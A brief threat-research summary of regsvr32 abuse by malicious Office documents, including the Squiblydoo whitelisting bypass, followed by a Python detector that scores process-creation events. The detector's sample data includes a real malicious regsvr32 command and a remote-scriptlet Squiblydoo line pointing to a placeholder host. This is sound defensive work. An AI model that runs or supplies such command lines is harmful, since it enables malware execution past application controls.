Researchers at Uptycs labs have documented an increase in regsvr32 execution via malicious documents in recent months. The research team observed over 500 samples using regsvr32.exe to register .ocx files, with command lines similar to the example below:
- regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Dotr4.ocx
Regsvr32 can also load COM scriptlets and execute DLLs without changing the Registry: the COM object is never actually registered, only executed. This is the technique known as Squiblydoo, which allows application whitelisting to be bypassed.
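Detection logic for the pattern described above, as an added example that is not code from the Uptycs report: it checks constructed process-creation events for the traits the text names (an Office parent, `/n` combined with `/i:`, a module under ProgramData, and scriptlet loading through scrobj.dll). The event field names `parent` and `cmdline` and the sample events themselves are assumptions.

```python
import re

# Constructed sample process-creation events (not taken from the Uptycs article)
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": r"regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Dotr4.ocx"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"regsvr32 /s /n /u /i:http://example.invalid/x.sct scrobj.dll"},
    {"parent": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"regsvr32 /s C:\Program Files\Vendor\plugin.dll"},
]

OFFICE_PARENTS = ("winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe")
# Directories a standard user can write to; a signed vendor DLL normally lives elsewhere
WRITABLE_DIRS = re.compile(r"\\(programdata|users\\[^\\]+\\appdata|windows\\temp)\\", re.I)
INSTALL_SWITCH = re.compile(r"(?:^|\s)[-/]i(?::(\S*))?", re.I)  # /i[:cmdline] -> DllInstall
NOREG_SWITCH = re.compile(r"(?:^|\s)[-/]n(?=\s|$)", re.I)      # /n -> skip DllRegisterServer


def is_regsvr32(cmdline):
    """True when the first token of the command line is regsvr32(.exe)."""
    parts = cmdline.strip().split()
    if not parts:
        return False
    first = parts[0].strip('"').lower()
    return first == "regsvr32" or first.endswith("regsvr32.exe")


def assess(event):
    """Return the list of suspicious traits found in one process-creation event."""
    cmd = event["cmdline"]
    reasons = []
    if not is_regsvr32(cmd):
        return reasons
    install = INSTALL_SWITCH.search(cmd)
    if install and NOREG_SWITCH.search(cmd):
        # /n with /i: nothing is registered, the module's DllInstall is simply run
        reasons.append("dllinstall_without_register")
    if install and install.group(1) and re.search(r"(?i)https?://|\.sct\b", install.group(1)):
        reasons.append("remote_scriptlet")  # classic Squiblydoo: /i:<url to .sct>
    if re.search(r"(?i)\bscrobj\.dll\b", cmd):
        reasons.append("scrobj_loader")
    if WRITABLE_DIRS.search(cmd):
        reasons.append("module_in_user_writable_dir")
    if event["parent"].lower().rsplit("\\", 1)[-1] in OFFICE_PARENTS:
        reasons.append("office_parent")  # launched from a document, as in the samples
    return reasons
```

Any event with two or more traits is worth an analyst's look; a single `office_parent` hit alone is common enough with legitimate add-ins that it should only raise the score, not alert by itself.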